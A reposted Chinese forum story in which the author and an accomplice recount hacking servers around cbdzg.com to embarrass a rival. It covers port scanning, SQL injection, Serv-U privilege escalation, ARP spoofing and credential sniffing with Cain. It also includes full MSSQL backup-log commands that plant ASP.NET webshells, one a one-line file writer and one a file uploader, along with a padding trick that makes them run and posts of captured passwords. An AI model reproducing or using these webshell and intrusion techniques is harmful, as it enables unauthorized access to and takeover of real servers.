10月28号安全焦点DDOS事件背后内幕串串烧
本文转载自安全焦点
10月28号安全焦点DDOS事件背后内幕串串烧~~
主题:讲述安焦被DDOS背后的故事及部分安全知识!同时奉送ASP.NET备份db日志获得webshell小知识,小小伎俩,牛人莫笑话俺了。
本贴纯属娱乐大众!慰安下各位fans在安焦被D 9天以来无法灌水的损失。
大家好,我是克劳德,俺来向安焦水区的各位fans道歉来了,10月28号Xfocus遭遇ddos攻击,被迫关闭9天,俺是引起这件事幕后的四只黑手中的两只。另外两只黑手是13Bean同志啦。
下面开始讲故事啦:
话说朽木同学借入侵腾讯公司网络事件一举成名后,更借机到安全一套露了一 小脸,惊起网上呼声一片,一时间,朽木同学好不得意。
正如朽木同学自己所说,他出了名,所以n多人就眼红他的名气了,俺不敢苟同,我对朽木同学地那点名气还瞧不上~说个不好听的话,上了安全一套后,记者提问,如何入侵的腾讯公司网络?朽木同学答阅:我发现了他们服务器的漏洞! 绝口不提是风吹过pp好冷同学种马在前,他收获在后了?? 我一直关注这个事情,一直希望了解下朽木同学入侵的第一步是如何做的,可惜小伙子实在太清高了,俺加他qq后,其一句话:你和我的律师去谈。靠~~~其后发生的事,大家都看到一些啦,不管大家爽不爽,反正我不爽啦,蛋总的cbdzg不是说朽木同学协助修补了网站漏洞么? Ok 那我就拿cbdzg开刀,想想,一个人黑cbdzg 好是无聊,正好,13Bean同志,这位社会主义的弃儿,一直在家待业,等待祖国母亲的召唤,俺就拉了13Bean上了贼船。
克劳德:13Bean,我们黑掉cbdzg,好不好撒?
13Bean:好啊,黑了selang更好,挂个黑页你就出名了撒。
克劳德:看了xx人不是很爽,要丢丢他的脸而已。
13Bean:好,我和你一起搞。
就这样,2个闲极无聊的混混走道一起了,从此江湖上一片血雨缤纷。。。
Ok,有人做伴,黑站也不孤单了!白天忙完工作,晚上回家粗略的看了下,www.cbdzg.com是一台外部托管服务器,机房ip地址在厦门???启动linux虚拟机,操起nmap扫描下端口先。
Nmap –sS –vv –P0 www.cbdzg.com
一杯茶功夫,结果出来了:
开放80,520端口
520??? 觉得纳闷了,telnet 上去,服务器回显serv-u 6.0.x,噢!果然是520哟!!!!serv-u 众所周知,有本地连接管理端口漏洞,呵呵!我也爱你!
奇怪,就80和520,那么远程管理怎么办???难道管理员常驻机房管理??机房的空调和风扇可是很恐怖的噢!
再来扫描瞧瞧:
Nmap –sS –vv –P0 www.cbdzg.com –p 1-65535
-p 1-65535 指定扫描1-65535号端口,默认情况下nmap只会扫描其自带的一份常见端口列表中的端口,大约一千多个端口吧,所以这份端口列表清单以外的端口 nmap是不会去扫描的。
Ok,过了会功夫,再看看结果,已经出来了,这次多了个32915的开放端口,呵呵,32915这个数字好像很眼熟,后来发觉32915是朽木同学的qq号来也,ok,无须质疑,直接运行mstsc,连接www.cbdzg.com:32915
出现了久违的终端管理界面,呵呵,我喜欢。哇,还没回过神,终端窗口弹出一个对话框: 大致内容是 各位小黑朋友珍爱生命啦!不要玩火啦, By 朽木
服务器系统是windows 2003 datacenter版的系统,呵呵,算我愚昧,这辈子玩了多年计算机,第一次见刀datacenter的操作系统,照相纪念先!!!据我所知,好像普通人都用不上datacenter吧?
浏览了下www.cbdzg.com的网站,整站asp程序,粗略估计是asp+sql 或者asp+access结构,首页上连接的asp程序,随手加了单引号测试,看出错信息,变量都做了匹配数字检查了,估计正如蛋总所说,朽木同学热心的修正了蛋总网站的漏洞啦! 既然如此,那么走sql注入,找网站漏洞估计没策了,我是没兴趣套字典去爆破web上用户的管理员密码什么的破玩意的啦,说来不怕大伙笑话,我还没用过嗍雪爆破过密码啦。靠,web漏洞既然找不到(不是我找不到,闲着没事,娱乐,就懒得去花大力气折腾了,唉,人懒了就不好,做贼也得勤快下啊!!!后来的事实证明一切我都错了,www.cbdzg.com的网站整个一大堆垃圾asp+access数据库拼凑起来的杂种网站,大把漏洞,没有跑asp.net的应用,依旧启用了asp.net的支持,随便request一个http://www.cbdzg.com/test.aspx的页面都能返回asp.net的错误,启用了asp.net意味着什么?只要在能获得aspx的webshell的情况下,普通虚拟主机针对asp做的webshell以及文件读写权限限制可能就失效了!!!!!),看开放的端口情况,以及hping发出的包的情况来看,hping 发送syn包到其他未开放端口均返回RST包,ttl和开放服务的端口一致,nmap扫描能正常执行下去,那么服务器应该没有硬件防火墙了,仅仅在win2003系统级启用了系统内置的防火墙了。
Web走不通,那么还有ftp套弱口令? 套口令? 傻子干的事,我才没那么好精神去折腾,菜鸟干活速战速决。
克劳德: ???
13Bean: 在
克劳德:有没看看www.cbdzg.com? 好像普通asp注入都过滤了,你看看这个服务器周边的服务器。
13Bean:好
说完话,翻硬盘,随手找了个webdavscan的工具,扫描www.cbdzg.com的255.255.255.0子网网络的80端口,线程4个,多了会丢失连接或者给防火墙发现的,呵呵。
冲完澡,回来看,结果出来了,子网内大量的web服务器,很多近邻的Apache的banner都一样的,估计都是虚拟主机服务商的虚拟主机了,还有IIS6 IIS5,也很多,大致估计大部分都是虚拟主机了,虚拟主机就懒的费劲折腾了,一般我个人估计都没戏,没有任何执行权限,估计搞了也是白搞,webshell上去后没法提权的。13Bean也是个懒人,靠,我说没漏洞了,他也不复查看看,折腾来折腾去,后来真是后悔啊!!!!早知道花点心思看看cbdzg就得了,费了不少事。
写到这个时候,安焦又似乎被人d了,无法打开了,唉!!!这年头,还有人玩ddos,md,过时的玩意了,老掉牙了,你就不能来点新鲜的东西么?
继续写下去先!!!!
琢磨了下下一步如何攻击,既然假定asp注入给过滤了,或许存在其他的漏洞,懒的花功夫去翻那个破站的程序了,那么而且开放了3389以及ftp,而且ftp程序有漏洞,而且iis可以运行asp.net ,那么如果拿到ftp帐户,上传个asp.net的webshell上去,那么轻松就获得了users用户组的权限,想办法运行serv-u本地溢出或者找其他的本地如06040的溢出获取system权限,ok,那么就老办法,内网sniffer吧!
运气特好,花了点功夫,在子网里面翻到了一个asp的注入漏洞的,而且是dbo权限,立刻本地装了个mssql2000,调试温习了下相关的sql语句,脚本小子都莫笑话俺了,现在工作不用sql2000了,都忘干净了,瞎折腾了一下,顺利拿到了system权限,3389登陆系统,ipconfig,靠!!!竟然是255.255.255.224的子网掩码,完了,不在同一子网,看来算计arp攻击的 没策了。
13Bean: 白搞了啊,不是同一子网,靠
克劳德: 是啊,倒霉,知道子网掩码了,继续找那个子网的
下面一台一台的到webhosting网站查虚拟主机了,靠,痛苦啊,随便翻来翻去,好像找不到入侵点了。
13Bean:有搞头
克劳德:怎么?我没
看到什么网站有漏洞啊
13Bean:你看XX.XX.XX.XX这个ip 有个XX网站,XX网站肯定有漏洞撒
克劳德:哇,我发现你好伟大,我看的时候好多域名捆在上面,可是都是过期了,下面几个我都懒的翻了。
13Bean:黑客精神不能放弃撒
克劳德:jb黑客,老子和你是2个sb黑客
好,继续看13Bean丢过来的xx网站,好几个应用程序,asp+access的,很自然有sql注入漏洞,也很随便的猜到了后台地址。找个工具,暴到了后台管理密码,一个图片管理系统,找来找去好像没上传漏洞等可以利用的。
克劳德:13Bean,怎么样了,图片管理系统后台好像没有什么可以利用的
13Bean:等等,我一句话木马写进去了,找了另一个后台,马上获得webshell
克劳德:好
。。。
。。。
13Bean:http://www.xxx.com/helper.asp 站长助手,密码123456
克劳德:偶像啊!!!!
13Bean:日
克劳德:赶快serv-u提权看看
13Bean:==
。。。
。。。
13Bean:哈哈,成功了
Net user
User accounts for \\XX服务器
-------------------------------------------------------------------------------
Administrator goldsun Guest
Iusr_xx IWAN_xx
The command completed successfully.
用户名:goldsun 密码:love
克劳德:噢,偶像!!!你好伟大!
13Bean:(害羞表情)
克劳德:我现在上去,装cain 抓内网密码,赶快在搞一台肉鸡,然后sniffer 蛋蛋的cbdzg
13Bean: 好,渗透的事交你了
克劳德:我怕朽木在服务器上装了antiarp,如果我直接sniffer 蛋蛋的站,估计利马就给发现了,保险点,在搞台肉鸡比较好(事后证明我是个大sb,总是把别人高估了)
13Bean:嗯
登陆肉鸡,顺利装了cain,选定了几个目标,开始arp spoof攻击,抓ftp密码。
天色已晚,挂机,睡觉先。
Cain是我感觉在渗透时最好用得sniffer软件了,普通的明文密码都可以抓获,sql,mysql,http等等,感觉用过的最方便的一次是在一次sql注入中,已经获知了web连接sql是dbo权限,对web和db之间的通信做了arp欺骗攻击,轻松就获得了sql的dbo用户密码,进而获取了system权限。arp spoof以及sniffer几个鼠标点击就完成了,相比同类型的linux下的ettercap相对差了点,至少操作不方便,相对国内的卖网马,卖expliot的所谓黑客高手而言,国外的黑客至少我觉得从精神上 道德上比中国所谓的黑客要高尚多了,某些人写了个所谓的独立开发完成的木马或者ddos工具 无不拿出来炫耀,卖钱去了,精神没有专注在技术上,我想写出来的程序也不会好到哪里去吧,如此下去,中国永远不可能出现类似cain这样如此优秀的程序了。
声明下:我不是什么专职黑客,13Bean也不是,我只是个系统管理员,对系统漏洞,安全方面大致都一些了解,一年多也没接触sql注入了,手工注入命令都忘记了,这里入侵用到的知识只是平时系统、网络管理知识的积累,以及google找的相关资料,以前接触过一些黑客知识,现在感觉主要加深了个人对系统整体安全防御的理解。奉劝各位,黑客没有什么前途,最近我看了很多黑客界的娱乐新闻以及所谓的内幕,所谓的第4,第5代黑克都tmd是小人,骗子流氓,真正研究黑客技术就注定不能接触黑金!!!粘了黑钱,技术也不叫技术了,这是真话。不过俺蛮喜欢看黑客界的娱乐新闻和内幕第,欢迎各位fans 和我交流娱乐新闻哟!!
黑客?其实再想想,黑客都是流氓小人骗子,未经主人同意,入侵了系统,难道不是么?偏偏一大群小p孩喜欢跟风,是吧,很光荣,对吧,一大堆人追捧你,或许觉得很有意思?但请不要忘记了本质,你入侵了系统,你tmd就是个贼了,你就触犯了刑法,虽然有人会以他还是个孩子我还小我不懂事来逃避责任,说多了听多了也觉得腻味了。黑客?所谓的丰功伟绩,英雄事迹哄哄小孩子农民伯伯或许还行的通,哄内行人给人看了笑话。随便抓个所谓的黑客过来我想问几个基本的网络问题就可以把他问的无语,做黑客?最少要理解网络吧?不管你用工具也好,但如果你连底层协议运作都不明白,你算个鸟的黑客?真正理解了网络,明白了安全的人,随时都可以客串黑客过过所谓的黑客的瘾。
现在中国标杆的第1 2 3代后客都拼了命的骂第4 5代黑客越来越堕落了??不知道形容的对不对,不去研究底层安全技术,就知道玩脚本入侵,我觉得也好笑,或许现在的第4 5代黑客生财有道,偶听说教主赚了300w啊???老前辈们看了估计比较郁闷?也许眼红?毕竟正规正局的赚那么点技术钱真的很不容易。但不管你是脚本黑客还是底层黑客,你只要在自我的基础上超越了自我,我觉得就够了,毕竟,安全涉及了方方面面,底层编程?系统防御?网络过滤?行政管理?很多,也让人很疲倦,如果老前辈们非要逼迫那些不懂c 数据结构的第4 5代黑客去做些研究底层编程的问题,或许这样他们认为是真正的在研究安全了,但我想也没有任何意义,研究下去个人的能力是否能有质的提升? 我对程序不在行,所以我一直没有进入程序这一块,但我并不觉得我在安全以外。是否喜欢研究底层核心安全只在于他个人是否愿意在精神 技术上提升自己了,在中国这个浮躁 势利的社会,任何的一切都是为了¥,活着的人其实都很无奈的为了¥而活着。
天亮鸟,继续干活,登陆肉鸡3389,上cain看了下,抓了大把http密码,好像还有管理员的后台密码,ftp密码也有几个,一个一个的登陆上去看了几下,顺便把相关密码信息留言发给13Bean的qq上了。
白天忙工作先,差不多太阳晒屁股的时间,13Bean同志从床上爬上网上来了。上来就打了个招呼先,不愧是在同一条战线上的好同志啊!!!
13Bean:有没什么收获,内网?
克劳德:抓了几个机器的ftp和web系统的管理后台,好像都是虚拟主机,有一两个是托管的服务器,但找不到可以利用的地方。先等等,继续等等,多弄台肉鸡保险点好。
13Bean:哈哈,搞不到,老子就到内网d蛋蛋的机器
克劳德: 靠,你也太没品味了吧,这年头,你还玩d?
13Bean:说的好玩的,鬼才d他,我在看看你发来的sniffer到的密码先。
克劳德:你看这里哟http://www.tianya.cn/xxxxx.htm,我发掘了一个火贴,蛋总发的朽木同学某年某月要接受安全一套的采访的帖子,不看里面的视频我还真不晓得咧,xfocus的flashsky也跑到里面灌水啊,我们也去起哄去撒!!!
13Bean:好啊,把这个帖子顶上去
就这样 2个无聊的家伙又到天涯闹翻了天,最后该帖子翻页过了4页,辛苦死了!我再这里替各位没有看到的fans回味下,这个帖子内容非常精彩,揭短对骂的火爆异常啊!可惜第二天再上去灌的时候发现已经被删除了,不知道是为何?俺发现所谓的黑客圈子,每每只要吵架就特别娱乐哟!什么狗屁内幕啊,都给甩出来了。真可谓是娱乐大众的好题材。
克劳德:天涯的帖子给删了啊!靠 好不容易炒作到那样了,暴了好多内幕哟
13Bean:啊???不会吧 昨天晚上的我还没有看啊!!!遗憾啊
克劳德:这里还有个撒,安焦的
https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=62188&page=all 安焦的肯定不会删,你看看,这个帖子再安焦水区的推荐贴哟!!!天涯的删就删,到安焦炒作区撒
13Bean:好,你还蛮喜欢看这些娱乐新闻咧?
克劳德:没办法撒,我们是伪黑客,关注下娱乐新闻 过过黑客的瘾撒!
天涯吵完鸟,继续干活,等了好几天了,就是没有嗅到什么有价值的东西,郁闷啦!!
13Bean: 有没消息?
克劳德:没有啊,倒是嗅到了一大堆sa密码,有个sb一天到晚的用工具爆破旁边一台机器的1433端口的sa密码,他不累老子看的都累了
13Bean: 这种sb现在还有啊???
克劳德:没办法撒,我们伟大祖国的黑客培训事业欣欣向荣,也培育了一大堆可爱的小黑撒
13Bean: 就是 服了他们了,随便都能爆破个sa密码 那小黑不都成了大牛了?
克劳德:再等等吧,我怕朽木真装了antiarp,不然我随便嗅他的,那我不给暴露了?靠 到时候警察叔叔要来抓我的哟
13Bean:直接搞了拉倒,少费事
克劳德:烦躁,搞!我修改下Cain的端口过滤规则,把ftp的21要改成520端口,朽木改了ftp的默认端口
13Bean:好
克劳德:靠,竟然可以搞arpspoof,我还因为朽木搞了antiarp之流的东西,吓死我鸟,我怎么老高估了别人?
13Bean:你个sb,折腾这么多事
克劳德:我只是客串出演下黑客,技术不娴熟撒
克劳德:我抓了个sql2000的帐户,旁边有台机器好像和远程做了分发同步,每天都定时连接数据库做数据同步,普通db_owner的权限,可以备份日志搞个webshell,你等等,我可以直接从外部用sql企业控制台连接服务器的1433呢
13Bean:对外开放了网站么?
克劳德:有,www.xxx.com www.bbb.com www.ccc.com都是的,不过都是aspx的站,好像不支持asp,请求asp提示内部错误
13Bean:那写asp的一句话木马,备份日志获得webshell走不通了???
克劳德:估计是的,aspx的一句话木马网上有没有啊??
13Bean:没有 我搜索过了
克劳德:你等等,我找找asp.net的代码调试下,或者我找个朋友问问
13Bean:好
过了一两天
克劳德:兄弟,我成功了,aspx的备份日志木马我搞定了,我搞了2个
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("i.aspx"),false);ow.Write(Request.Params["m"]);ow.Close()%> ')
backup log pubs to disk = 'd:\haha.aspx'
这个和asp的一样,客户端post一个变量m 把木马代码丢在变量m里面 就ok了 这个是类似asp的一句话木马
下面这个是我找网上的asp.net的上传文件程序,修改精简了下,也可以用,我在本机调试好了
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bc(object o,EventArgs e) {string u="files";string filename;int pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form method="post" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="Server" OnServerClick="bc" /></form>')
backup log pubs to disk = 'c:\inetpub\wwwroot\ha.aspx'
13Bean:web路径你知道么?
克劳德:web路径知道啊,用xp_dirtree找到路径了
13Bean:你快搞啊
克劳德:等等。。。
克劳德:代码有点问题啊,怎么在服务器上执行备份的代码执行会出错啊??
伤脑经,http://wwww.xxx.com/haha.aspx 你看
13Bean:怎么回事?
克劳德:你等等 错误提示里面我的木马代码怎么有个字符给替换成一个特殊字符了??
13Bean:你自己看看,我不懂
克劳德:我在弄弄
克劳德:我知道原因了,备份的日志文件好像sql内部用了这个特殊字符做分界符??我刚才把代码全部改成aaaaaaaaaaa的普通文本了,请求url没有报错,看来那个字符在搞鬼,我知道怎么搞了
13Bean:好 等你消息了
克劳德:ok,搞定了,在写木马到db的时候,在木马代码前面填充306个字母a 我就躲避过了这个字符,备份的webshell可以执行了
13Bean:地址?
克劳德:http://www.xxx.com/ok.aspx
13Bean:怎么上传文件也会出错啊?
克劳德:我不知道啊啊,烦死了,.net默认屏蔽了外部看到错误信息的,只能本地看到错误信息
13Bean:怎么办?
克劳德:你等等,我刚才改的那个aspx的上传文件代码里面有错误捕获的,为了最小化代码,我去掉了。我加入错误捕获看看是什么导致的
13Bean:好
克劳德:
drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\T ' with init
insert into pubs.dbo.cmd(a) values ('<script language="c#" runat="server">private void bp(object o,EventArgs e) {string u="files";string filename;try {int pos = f.PostedFile.FileName.LastIndexOf("\\");if (pos > 0) filename = f.PostedFile.FileName.Substring(pos + 1);else filename = f.PostedFile.FileName;Response.Write(Server.MapPath(u) + "\\" + filename);f.PostedFile.SaveAs(Server.MapPath("filename"));} catch (Exception ex) {Response.Write("Error: " + ex.Message.ToString());}}</script><form method="post" runat="server"><input type="file" id="f" runat="server" size="50"/><input type="submit" value="s" runat="Server" OnServerClick="bp" /></form>')
backup log pubs to disk = 'd:\haha2.aspx'
克劳德:http://www.ddd.com/haha2.aspx 丢上去了,靠 提示上传文件没有写入权限,靠!!!!
13Bean:倒 怎么这么变态?
克劳德:老子倒霉,白折腾了几天
克劳德:噢,你等等 他有一个网站的后台,是弱口令,可以登陆进去,里面可以上传图片管理的啊,我记得我都用过,那么那个上传图片的目录一定有写权限,你在等等
13Bean:好
良久
克劳德:ok 找到图片上传路径了 http://www.xx.com/upload/haha.aspx 我写这里去了 上传文件ok了! http://www.xx.com/upload/ok.aspx木马 密码123456
13Bean: 怎么提示文件找不到
克劳德:啊?不会啊 上传其他的文件都没有问题啊!!!难道被杀了?
13Bean:你等等 我有个aspx的免杀木
姓名:Chinadu
近期评论